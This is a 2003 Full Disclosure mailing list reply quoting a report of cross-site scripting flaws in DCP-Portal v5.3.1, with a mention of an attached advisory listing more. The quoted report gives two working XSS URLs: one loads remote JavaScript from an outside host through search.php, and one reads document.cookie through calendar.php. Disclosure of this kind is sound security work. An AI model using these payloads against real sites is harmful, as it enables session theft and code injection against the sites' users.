Full Disclosure mailing list archives

Re: Some XSS vulns

From: mcbethh () op pl
Date: Wed, 19 Mar 2003 19:01:25 +0100

On Wed, 19 Mar 2003 01:59:35 +0200
Ertan Kurt <ertank () olympos org> wrote:

DCP-Portal v5.3.1
http://target/search.php?fields=content&q=<script%20src=http://othersite/code.js></script>
http://target/calendar.php?year=<script>alert(document.cookie);</script>&month=03&day=05
Vendor Site: http://www.dcp-portal.org


I've found many more vulnerabilities in dcp-portal... look at attached
advisory.


Regards
Grzegorz Aksamit

----------------------------------------------------------
 ( signature censored )
---------------------------------[ grzegorz aksamit ]-----

Attachment: dcp-advisory-06-02-2003.txt
Description:

Current thread:

Re: Some XSS vulns mcbethh (Mar 19)